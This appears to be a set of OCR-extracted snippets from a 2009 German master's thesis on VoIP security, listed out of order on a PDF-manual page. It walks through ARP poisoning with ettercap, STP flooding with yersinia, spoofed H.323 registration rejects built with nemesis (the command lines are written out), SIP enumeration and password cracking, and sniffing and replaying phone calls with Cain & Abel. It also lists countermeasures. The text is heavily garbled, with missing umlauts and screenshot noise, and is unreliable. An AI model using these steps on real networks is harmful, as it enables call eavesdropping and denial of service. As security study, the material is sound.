374. uation Ablauf und Bedingungen f r Angriff 126 5 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 128 5 5 1 RTCP Bye teardown 129 5 5 2 Technik und Funktionsweise 130 5 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 130 5 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 132 6 Angriffe auf der Netzwerkebene Einf hrung 133 6 1 1 ARP Spoofing 134 6 1 2 Technik und Funktionsweise 135 6 1 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 135 6 1 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 138 6 2 1 Denial of Service MAC Spoofing 139 6 2 2 Technik und Funktionsweise 140 6 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 140 6 2 4 MAC Spoofing gegen Port Security 142 6 2 5 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 142 6 3 1 MAC Flooding 143 6 3 2 Technik und Funktionsweise 144 6 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 144 6 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 145 6 4 1 STP Angriff 146 6 4 2 Technik und Funktionsweise 147 6 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 147 6 4 4 DOS STP Flooding Angriff 150 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 8 oo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz
375. uelle Kommunikation auf jedem Netzwerk das Pakete bertr gt erm glichen Es ist zur Zeit in verschiedenen Anwendungen wie zum Beispiel NetMeeting und OpenH323 implementiert Der Hub engl Nabe tech Knotenpunkt bezeichnet in der Telekommunikation Ger te die Netzwerk Knoten physisch sternf rmig verbinden Normalerweise wird die Bezeichnung Hub f r Multiport Repeater gebraucht Sie werden verwendet um Netz Knoten oder auch weitere Hubs z B durch ein Ethernet miteinander zu verbinden InterAsterisk eXchange Abk IAX ist ein Protokoll welches von der OpenSource Telefonanlage Asterisk benutzt wird Es dient dabei sowohl zur Verbindung zwischen einzelnen Asterisk Servern als auch zur Kommunikation zu Endger ten mit denen somit Voice over IP Gespr che m glich sind Aktuell findet die Version 2 IAX2 Verwendung Hiermit kann ein Router oder ein Angreifer eine Meldung an das sendende System schicken und es auf ineffizientes oder ge ndertes Routing aufmerksam machen Dies geschieht indem er den Header des originalen IP Pakets an die ICMP Meldung angeh ngt Damit wei das Sendersystem welche Zieladresse schlecht zu erreichen war und nimmt einen anderen Router Nat rlich enth lt das ICMP Paket auch den Router ber den das Ziel im Idealfall angesprochen werden sollte Ein Intrusion Detection System IDS ist ein System zur Erkennung von Angriffen die an ein Computersystem oder Computernetz gerichtet sind Das IDS kann
376. ufgaben keine Zeit mehr Ein so angegriffener VOP Proxy Server wird folglich keine Verbindungsanfragen mehr seiner User entgegen nehmen k nnen oder im besten Fall mit sehr viel Verz gerung Auch die Weiterleitung der RTP Pakete bestehender Gespr che wird stoppen oder zumindest sehr viel verz gert und verzerrt bei den VOIP Terminals eintreffen Nat rlich ist es auch m glich statt den VOIP Server einzelne Endger te anzugreifen was aber weit weniger effektiv ist als das Herzst ck der Telefonie Infrastruktur Schutz gegen Angriff Analyse Switche mit DoS Detektoren verwenden welche solche Angriffe unterbinden ICMP Echo Requests im Netzwerk sperren nicht auf Broadcast PING antworten und diese im Router schon gar nicht weiterleiten lassen Siehe Massnahmen PING Flood Kapitel 8 5 11 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 153 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 6 2 Technik und Funktionsweise Statt eine Liste mit den IP Adressen der Hosts zu f hren an welche ICMP PING Echo Requests gesendet werden sollen kann der Angreifer auch gespoofte ICMP PING Echo Requests an die Broadcast Adresse senden Somit wird jeder angeschlossene und aktive Host im Netzwerk diese Nachricht erhalten und der gespooften Source IP Adresse antworten Ein Angriff via die
377. ufgezeichnet und gleich als WAV File im Systempfad von Cain amp Abel abgelegt Der Tab VOIP enth lt die Eintr ge der gesnifften VOIP Gespr che F r eine interne Gespr chsverbindung werden immer 2 Gespr che aufgezeichnet eine Gespr chsverbindung von User Agent 4129 zu 4111 und eine von 4111 zu 4129 obwohl es sich um ein und dasselbe Gespr ch handelt Zum Abspielen der aufgezeichneten Gespr chsdaten ist mittels rechter Maustaste das gew nschte Gespr ch zu selektieren und dann Play zu w hlen u F EIRENE a File View Configure Tools Help a owm o 28 9mmaE BOCs OF i amp Decoders E Network ES Sniffer d Cracker Ee Traceroute E CCDU a Wireless ES Query Closed IP1 Codec 1P2 Codec 10 1 1 129 3000 PCMU 10 1 1 401 17292 PCM Status File Size 10 1 1 121 3000 PCMU 10 1 1 101 14616 PCM Play Remove Remove A amp vor http www oxid it Es wird automatisch der Standardmusikplayer des Systems ge ffnet und das Gespr ch wiedergegeben Im Gespr ch sind beide Tonspuren 4111 und 4129 h rbar es kann also die Konversation so geh rt werden wie sie auch wirklich stattgefunden hat Windows Media Player Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 117 Berner Fachhochschule Technik und Informatik Software Schule Schweiz 5 2 5 RTP sniffing mit Wireshark Version 1 05 Nach dem
378. uni bremen de prelle terena cookbook Cookbook_D2 figures chapter4 register png Die obigen Informationen betreffend SIP Protokoll sind nicht abschliessend und vollumf nglich aufgef hrt Sie dienen jedoch dem besseren Verst ndnis um die in den n chsten Kapiteln aufgef hrten Angriffe begreifen und selbst nachvollziehen zu k nnen Tiefere und weiterf hrende Informationen ber das SIP Protokoll sind unter folgenden Links erh ltlich http www sip ch http de wikipedia org wiki Session_Initiation_Protocol http www ietefxx64 ch http www ietf org html charters sip charter html Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 31 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 2 1 Enumeration SIP User amp Extension en Vertraulichkeit x Eingesetztes Tool Verf gbarkeit zenmap nmap Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http insecure org nmap Hinweise zu Installation Verf gbarkeit Installation Tool 2 Anwendung Tool 2 Zenmap ist die grafische Erweiterung von nmap welches auch in Erforderliche Vorkenntnisse 3 BackTrack3 integriert ist Zenmap ist sowohl f r Windows und Linux erh ltlich Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 2
379. urchgehen der Auflistung sofort festgestellt werden welches zum Beispiel der SIP Proxy Server ist Somit lassen sich gezielt lohnenswerte Ziele f r weitere Angriffe aussuchen Die Enumeration selbst birgt f r das Angriffsziel keine wirklich grosse Gefahr ausser dass in Sachen Vertraulichkeit Informationen ber das Angriffsziel gesammelt werden Jedoch darf diese Angriffsart nicht untersch tzt werden denn sie ist immer als Vorbereitung weiterf hrender Angriffe gedacht Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 34 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 2 3 Enumeration SIP User amp Extension ee Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x SIPSCAN Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www hackingvoip com Hinweise zu Installation Verf gbarkeit Installation Tool 2 Anwendung Tool 3 Das Tool ist unter Windows lauff hig Nach dem Download einfach Erforderliche Vorkenntnisse 3 sipscan exe ausf hren und den Installationsanweisungen folgen SIPSACN ist nicht in BackTrack3 enthalten Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 4 Ziel Angriff Analyse Mittels SIPSCAN werden gezielt SIP Nachrichten wie INVITE REGIS
380. urity 19 02 2009 S Sch r MAS 06 02 20 Seite 62 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz destroying libnet handle deallocating memory for string containing poison user part Number of packets sniffed from target 6 Number of INVITE requests sniffed from target 2 Number of poisoned redirect replies transmitted to target 1 bt KKK Untenstehender Wireshark Trace zeigt folgenden Ablauf Paket 29 User Agent 4129 initiiert Anruf zu User Agent 4119 Paket 30 Angriffstool antwortet mit gespoofter IP Adresse 301 MOVED PERMANENTLY Paket 34 SIP Proxy sendet die original INVITE Nachricht an User Agent 4129 Paket 36 Es wird eine zus tzliche INVITE Nachricht an User Agent 4111 gesendet Paket 37 User Agent 4119 beginnt zu klingeln und quittiert dies Paket 39 User Agent 4111 beginnt auch zu klingeln und quittiert dies ebenfalls WU 129zu4111redirected pcap Wire stark ae Eile Edit View Go Capture Analyze Statistics Help Filter p Expression Clear Apply No Time Source Destination Protocol Info 27 18 901103 CompalIn_Ob ad 96 Broadcast ARP who has 10 1 1 12 Tell 10 1 1 241 28 18 901520 Netopia_21 79 14 Compalin_Ob ad 96 ARP 14 31 19 165675 Dell f0 22 43 Broadcast ARP who has 10 1 1 129 Tell 10 1 1 101 32 19 166326 Aastra_19 93 a7 Dell_f0 22 43 ARP 10 1 1 129 is at 00 08 5d 19 93 a7 40 19 920273 Intelcor_07 f3 50 Broadcast 48 21 000352 Compal n_0
381. ver Asterisk lief weiterhin konnte jedoch wie oben schon beschrieben w hrend den Test Cases aber keine Anfragen mehr der User Agents beantworten Nach dem Durchlauf der Test Cases war Asterisk wieder voll funktionst chtig Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 81 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz WillVoice PBX MANAGER PRO s ist sdm Hel f ver Jan 4 17 52 29 WARNING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3233 localhost for seqno 1 Cr a itical Response Jan 4 17 52 29 WARNING 1516 chan sip c 3633 process sdp Invalid host in c Line IP4 127 0 0 1 Jan 4 17 52 29 WARHING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3234 localhost for seqno 1 Cri tical Response Jan 4 17 52 29 WAHNINGLI1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 323 localhost for seqno 1 Cr itical Response Jan 4 17 52 29 WARNING 1516 chan sip c 3633 process sdp Invalid host in c line aasasaasa IP4 127 0 0 1 Jan 4 17 52 30 WARNENGLISI6 chan sip c 3633 pracess_sdp Invalid host in c line asaaaaaaaaaaaaaaa IP4 127 0 0 1 Jan 4 17 52 30 WARNING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3236 localhost for seqno 1 Cri tical Response Jan 4 17 52 30 WARMINGLISIIE chan_sip c 3633 process_sdp Invalid host in c line aaaaaaaazaaaaaaaaa
382. views mit dem Experten respektive Betreuer sind in obiger Zeitrechnung nicht ber cksichtigt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 218 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 4 4 Sitzungen Besprechungen Reviews Ziel Stand des Projektes Teilnehmer Diplomand Betreuer H ufigkeit Alle 2 Wochen Ort Aastra Telecom Schweiz AG Solothurn Dauer 30 Minuten Milestone Reviews Ziel Stand des Projektes Teilnehmer Diplomand Experte H ufigkeit Fix definierte Termine siehe unten vor Erreichen eines Milestones Ort SWS BFH Bern Dauer 30 Minuten Termine fiir Reviews Freitag 21 11 2008 08 30 Uhr Freitag 16 01 2009 08 30 Uhr Montag 02 02 2009 16 30 Uhr Weitere sonstige Termine Mittwoch 20 11 2008 08 30 Uhr 4 5 Milestones Milestones Abgabe Pflichtenheft an Experte elektronisch Best tigung Pflichtenheft durch Experte Upload Pflichtenheft und Eingabe Abstract Abnahme Realisierungskonzept durch Betreuer Angabe Ausstellungsmaterial Diplomplattform Realisierung abgeschlossen Abgabe der fertigen Master Thesis Projektbericht Pr sentation der Master Thesis Pflichtenheft Zwischenbericht Diplomarbeit Diplombericht Schulung Pr sentationstechnik an der BFH Datum 14 11 2008 28 11 2008 08 12 2008 30 01 2009 08 02 2009 19 02 2009 20 02 2009 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 219
383. vom Astreisk Proxy Server den Challenge mit der Aufforderung sich mittels MD5 Hashwert bei ihm zu authentifizieren Trace pcap Wireshark File Edit View Go Capture Analyze Statistics Help Filter Time Source Destination Protocol Info 31 9 626313 Netopia_21 79 14 Compal n_0b ad 96 ARP 10 1 1 1 is at 00 0f cc 21 79 14 32 12 516510 Intelcor_07 f3 50 Broadcast ARP who has 10 1 1 71 Tell 10 1 1 151 EERE ELIE a i a Ta pek IAX source call 4555 timestamp 3ms REGREQ No who has 10 1 1 151 Tell 10 1 1 111 35 13 494389 vmware_55 dd b4 Broadcast 10 1 1 151 is at 00 1c c0 07 f3 50 36 13 494540 Intelcor_07 f3 50 vmwar e_55 dd b4 Mit Paket Nr 37 wird die gespoofte Antwort des Angreifers an 4131 gesendet und ihm mitteilt das nur Klartext als Authentifizierungs Methode in Frage kommt Information Element Authentication method s 0x0001 Mit Paket Nr 38 antwortet der IAX Client 4131 dem Asterisk Proxy Server und sendet ihm den aus Passwort und Challenge gebildeten MD5 Hashwert zur Registrierung zu Trace pcap Wireshark File Edit View Go Capture Analyze Statistics Help Filter l i Oo Expression Clear Apply Time Source Destination Protocol Info 36 13 494540 ARP bytes on wire 64 bytes Ethernet II Src vmware_55 dd b4 00 0c 29 55 dd b4 Dst Intelcor_07 f3 50 00 1c c0 07 f3 50 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 151 10 1 1 151
384. ward Delay sec 15 Error Topology Changes 23 z support Time Since Topology Change 336 Help Hold Time sec 1 6 4 4 DOS STP Flooding Angriff Eine weitere Variante von einem STP Angriff wird untenstehend aufgezeigt Mittels des Tools Yersinia kann ein sehr potentieller Angriff gestartet werden Bei diesem Angriff werden eine Vielzahl von BPDU Nachrichten ins Netzwerk gesendet Die empfangenden Switche m ssen f r jedes erhaltene BPDU die Pfadkosten und somit den Spanning Tree neu berechnen W hrend dieser Zeit k nnen keine Nutzdaten zwischen den Switchen ber die Pfade transportiert werden Fr her dauerte die Neuberechnung der Pfade 30 Sekunden und mehr Nicht zuletzt deswegen wurde 2003 das Protokoll RSTP Rapid Spanning Tree IEEE 802 1w ins Leben gerufen bei dem die Neuberechnung des ganzen Spanning Trees unter 1 Sekunde liegt Trotzdem hat der Angriff eine sehr gute Wirkungskraft denn Yersinia schafft es 25000 gef lschte BPDU Pakete pro Sekunde ins Netzwerk zu senden Im Terminalfenster wird yersinia von BackTrack 3 aus gestartet Danach wird der Angriff mit folgenden Argumenten aus yersinia heraus gestartet yersinia stp attack 2 Untenstehender Wireshark Trace zeigt die gef lschten BPDU Pakete die Yersinia w hrend des Angriffes ins Netzwerk sendet File Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply Source Destination Protocol Info Frame 45061
385. weitere Angriffe t tigen Die Absicherung mittels VLAN und einer zus tzlichen Schutzmassnahme wie Authentisierung nach 802 1x siehe Kapitel 8 5 18 statische MAC Tabelleneintr ge siehe 8 5 2 oder VLAN Zugriffslisten bieten jedoch einen recht umfassenden Schutz Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 193 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 8 5 15 IDS Ein IDS Intrusion Detection System tiberwacht automatisch im Netzwerk Systeme oder das Netzwerk selber Dabei kann es sich um eine Hardware oder softwarebasierte L sung handeln IDS Systeme erkennen Angriffsversuche die sonst unerkannt bleiben w rden Dabei stellt das IDS Unregelm ssigkeiten beim betroffenen Angriffsziel fest welche im normalen Betriebs Status nicht vorkommen Zum Beispiel wird eine sehr grosse Menge gesendeter Pakete mit gleicher Absenderadresse oder spezielle String Folgen als m glicher Beginn eines Angriffes gewertet und Alarm geschlagen Daher arbeitet ein IDS gem ss Prozessmodell in drei Funktionsbl cken Informationsbeschaffung Das IDS muss zuerst kennen lernen wie der normale Betriebsstatus aussieht Analyse Im laufenden Betrieb sammelt das IDS sehr viele Informationen Diese werden analysiert Die Hauptmethoden dabei sind Misuse Detection und Anomaly Detection Minuse detektiert bekannte Sicherheitsangriffe Anomaly Unterschiede gegen ber dem normalen Betriebs Status Re
386. weiz Zur Kontrolle k nnen im Tab Targets noch einmal die gew nschten Angriffsziele angesehen werden ettercap NG 0O 7 3 Start Targets Hosts View Mitm Filters Logging Plugins Help Host List x Target 1 Target 2 10 1 1 129 10 1 1 101 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 65535 hosts for scanning f Scanning the whole netmask for 65535 hosts 10 hosts added to the hosts list Host 10 1 1 129 added to TARGET1 Host 10 1 1 101 added to TARGET2 Damit an die beiden Angriffsziele die manipulierten ARP Nachrichten gesendet werden wird die Man in the middle Mitm Attacke ARP poisoning wie folgt gestartet gt gt Mitm gt gt keine der beiden Auswahlboxen selektieren gt gt OK Start Targets Hosts View Mitm Filters Logging Plugins Help Host List x Targets x Target 1 2633 3229 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 65535 hosts for scanning Scanning the whole netmask for 65535 hosts 10 hosts added to the hosts list Host 10 1 1 129 added to TARGETI Host 10 1 1 101 added to TARGET2 lt P OK X Cancel Mittels Start gt gt Start sniffing wird die Sniffer Funktion gestartet welche die empfangenen Daten dieser zwei Angriffsziele ins vordefinierte Logfile logfileARPPoisoning pcap schreibt ett
387. x 2 lolx File Sniff Options tee pb lol x Q Network interface Microsoft MAC Bridge Virtual NIC Dox X cree In Plugins ist der stp_mangler zu selektieren Ab diesem Zeitpunkt werden ber die zuvor gew hlte Netzwerkbr cke die gef lschten BPDU Pakete ins Netzwerk gesendet welche die Switche im Netzwerk dazu veranlassen die Pfade von Spanning Tree neu zu berechnen und redundante Wege auf inaktiv zu setzen Infolge der gespooften sehr tiefen Pfadkosten des Angreifers wird dann der Pfad ber den PC des Angreifers gew hlt E ettercap NG 0 7 3 lol x Start Targets Hosts View Mitm Filters Logging Plugins Pluains gt item fs O O PPEp_ lt lear 0 PPTP Tries to Force cleartext tunnel pptp_pap pptp_reneg rand_flood remote_browser reply_arp scan_poisoner PPTP Forces PAP authentication PPTP Forces tunnel re negotiation Flood the LAN with random MAC addresses Sends visited URLs to the browser Simple arp responder Actively search other poisoners search_promisc Search promisc NICs in the LAN smb_clear smb_down stp_mangler Tries to Force SMB cleartext auth Tries to force SMB to not use NTLMZ key auth Become root of a switches spanning tree Pee ee ee a a OOONOONnNnOooOo ports monitored 587 mac vendor Fingerprint 1698 tcp OS Fingerprint ctivating stp_mangler plugin tp_mangler Start sending Fake STP packets activating stp_mangler plugin tp_mangler
388. x00 IP Frag offset 0x0000 IP Frag flags UDP Ports 3000 gt 3000 Wrote 50 byte UDP packet through linktype DLT_EN10MB UDP Packet Injected In Paket Nr 2897 wird die RTCP BYE Nachricht an User Agent 4129 gesendet Doch leider bleibt auch dieser Angriff ohne Erfolg Die Verbindung zwischen User Agent 4111 und 4129 bleibt bestehen und die RTCP BYE Nachricht des Angreifers bleibt ignoriert Der zeitliche Rahmen dieser Diplomarbeit liess es leider nicht mehr zu die Ursache des Ignorierens dieser RTCP BYE Pakete zu ergriinden trace 2897 ist user bye pcap Wireshark ioe File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info Zu Destin Destination p estinat DIS source port port rt ort 6 1 Source Sour 2897 15 854522 859 UDP ition p mm 9 Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst Aastra_19 93 a7 00 08 5d 19 93 a7 3 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 129 10 1 1 129 version 4 Header length 20 bytes Differentiated Services Field 0x00 DSCP 0x00 Default ECN 0x00 Total Length 36 Identification Oxce94 52884 9 Flags 0x00 5 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Hat ein Angreifer die M glichkeit den Netzwerkverkehr aufzuzeichnen so ist er auch in der Lage ges
389. yse Mit IP Spoofing t uscht der Angreifer eine falsche Identit t vor Somit kann er unberechtigt trotzdem Zugriff zu Netzwerken und VOIP Servern erhalten Oftmals ist der Zugang zu diesen Infrastrukturen mittels Firewall oder Paketfiltern gesichert so dass nur User mit bestimmter IP Adresse Zugang zu diesen Elementen haben Sehr oft werden auch die Managementzug nge der Router Switch Gateways oder VOIP Server so gesichert dass nur eine einzige IP Adresse Administrator berechtigt ist via remonte auf diese Komponente zuzugreifen Hat der Angreifer Zugang zum angegriffenen Netzwerk oder zur Netzwerkkomponente erlangt kann er im ungesch tzten Bereich seine Angriffe ungehindert weiterf hren Schutz gegen Angriff Analyse Siehe Massnahmen IP Spoofing Kapitel 8 5 7 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 156 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 7 2 Technik und Funktionsweise Im Header eines jedes IP Paketes ist die Source IP Adresse enthalten Somit kann festgestellt werden von wem das IP Paket gesendet worden war Dieser Header l sst sich jedoch mit einfachem Aufwand f lschen so dass eine andere Source IP Adresse vorget uscht werden kann Sicherheitsmassnahmen wie eine Authentifizierung welche lediglich darauf beruht die Source IP Adresse zu pr fen werden somit problemlo
390. zifiziert In der IP Telefonie ist das SIP ein haufig angewandtes http de wikipedia org wiki Session Protokoll _Initiation_Protocol SIPCrack ist ein Open Source Login Password Cracker f r das SIP Protokoll Das Programm besteht aus den Werkzeugen SIPDump mit welchem entsprechende SIPLogindaten vom Netzwerkinterface oder aus einem capture file erschn ffelt werden k nnen und dem eigentlichen SIPCrack mit dem die mit SIPDump http oneunity ronnysackmann de i erschn ffelten Logindaten geknackt werden ndex php site voip_siptools php SIPS funktioniert so hnlich wie HTTPS Es handelt sich um die Verschl sselung von SIP mit TLS SSL Beim Aufruf wird eine verschl sselte Verbindung aufgebaut Die Verbindung zwischen Telefon und Proxy wird verschl sselt und kann immer noch abgeh rt werden Die Daten k nnen jedoch nicht mehr eingesehen werden Bei den Server und Proxy Herstellern ist SIPS sehr h ufig http www elektronik implementiert Bei den Telefon Herstellern und SIP kompendium de sites net 1106061 Providern ist es dagegen weniger verbreitet htm Mit sip scan k nnen IP Bereiche schnell nach VoIP Ger ten gescannt werden Dazu wird der OPTIONS Request des SIP Protokolls verwendet Zum aufz hlen von IPs wird die Klasse IP_iterator verwendet http skora net voip attacks SiVuS ist ein Schwachstellenscanner f r VoIP Netze und Ger te Neben einem Scanner zum Finden von VoIP f higen Ger ten bietet er verschie
391. zu registrieren Der Angreifer jedoch hat die M glichkeit mittels einem Script die Registration Nachricht immer wieder in kurzen Zeitabst nden zu wiederholen Somit bleibt das Angriffsziel h chstens immer nur f r eine kurze Zeit registriert 4 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer sendet dem Endpoint 4151 mit der IP Adresse 10 1 1 151 eine gespoofte Registration Reject Nachricht Damit der Angreifer in Kenntnis der MAC Adresse des Angriffszieles kommt muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Eine andere Variante um an die MAC Adresse des Angriffszieles zu kommen ist die Enumeration wie sie in Kapitel 2 2 1 angewendet wurde Im Terminalfenster von BackTrack3 wird nemesis gestartet Nemesis wird dazu verwendet um ein g ltiges Registration Reject Paket im Zusammenhang mit dem vordefinierten IP Paket iSEC Registration Reject erstellen Der Angriff wird mit folgenden Argumenten aus nemesis heraus gestartet nemesis udp 1719 y 2171 S 10 1 1 241 D 10 1 1 151 H 00 1E EC OB AD 96 M 00 1c c0 07 3 50 P 1SEC registration Reject DOS v Die Werte im Einzelnen stehen wie folgt f r nemesis udp Startet nemesis mudus UDP x 1719 ber welches Port die Meldung abgesetzt werden soll y 2117 An welches Port die Meldung gesendet werden soll ersnifft mit Portscanner S IP Adresse des zu spoofenden Endpoints Servers D A

Download Pdf Manuals

image

Related Search

Related Contents

  AtmoSafe - This is the ATMOS Content Delivery Network  分割版2(PDF:1137KB)  diamond+no-needle English user manual  

Copyright © All rights reserved.
Failed to retrieve file